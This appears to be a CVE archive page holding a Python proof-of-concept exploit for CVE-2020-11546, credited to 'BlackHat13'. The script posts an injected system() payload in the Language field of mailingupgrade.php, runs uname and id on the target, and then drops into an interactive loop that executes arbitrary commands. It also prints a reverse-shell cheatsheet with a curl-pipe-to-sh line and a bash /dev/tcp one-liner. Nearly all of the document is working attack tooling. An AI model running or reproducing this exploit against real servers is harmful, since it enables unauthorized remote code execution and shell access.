4837 Total CVEs
26 Years
GitHub
Home / 2020 / CVE-2020-11546
README.md
Rendering markdown...
POC / CVE-2020-11546.py PY
⬇ Raw GitHub ✕ Close 
import requests
import sys
import urllib.parse
import argparse
req = requests.Session()
headers = {'Content-type': 'application/x-www-form-urlencoded'}
def check(target):
   print("[DEBUG] Sending Payload To the Target...")
   data = r"step=4&Language=de%7b$%7bsystem(%22echo asu%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E"
   resp = req.post("{}/mailingupgrade.php".format(target), data=data, headers=headers)
   if "asu" in resp.text and resp.status_code == 200:
       print("[OK] The target is vulnerable")
       print('''
+-----------[Reverse Shell Cheatsheet]-----------+
| > curl https://shell.now.sh/urip:port | sh     |
| > bash -i >& /dev/tcp/urip/port 0>&1           |
+------------------------------------------------+
''')
       exploit(target, "uname -a")
       exploit(target, "id")
       while True:
           command = input("Shell Command> ")
           if command == "exit":
               sys.exit()
           exploit(target, command)
           print('''type "exit" to exit''')
   else:
      print("\033[91m[ERR] Not Vulnerable:") 
def exploit(target, command):
        commandEncoded = urllib.parse.quote(command)
        data = r"step=4&Language=de%7b$%7bsystem(%22"+commandEncoded+r"%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E"
        resp = req.post("{}/mailingupgrade.php".format(target), data=data, headers=headers)
        print(resp.text.replace("Can't load correct language file in /language directory", ""))
def main():
    print('''
                  \033[
oooooooooo.  oooo                      oooo        ooooo   ooooo               .     .o    .oooo.   
`888'   `Y8b `888                      `888        `888'   `888'             .o8   o888  .dP""Y88b  
 888     888  888   .oooo.    .ooooo.   888  oooo   888     888   .oooo.   .o888oo  888        ]8P' 
 888oooo888'  888  `P  )88b  d88' `"Y8  888 .8P'    888ooooo888  `P  )88b    888    888      <88b.  
 888    `88b  888   .oP"888  888        888888.     888     888   .oP"888    888    888       `88b. 
 888    .88P  888  d8(  888  888   .o8  888 `88b.   888     888  d8(  888    888 .  888  o.   .88P  
o888bood8P'  o888o `Y888""8o `Y8bod8P' o888o o888o o888o   o888o `Y888""8o   "888" o888o `8bd88P'   
                                                                                                    
                                                                                                                                                               
 \033[92m	                    Remote Code Execution By BlackHat13    
 	          
\033[91m 	                      Author : 0fficial_BlackHat13 
''')
    parser = argparse.ArgumentParser(description='\033[96mHelp..',add_help=True)
    parser.add_argument('-u', action="store", dest="target", help='target url ex. http://target.com/')
    args = parser.parse_args()
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit()
    check(args.target)
if __name__ == "__main__":
    main()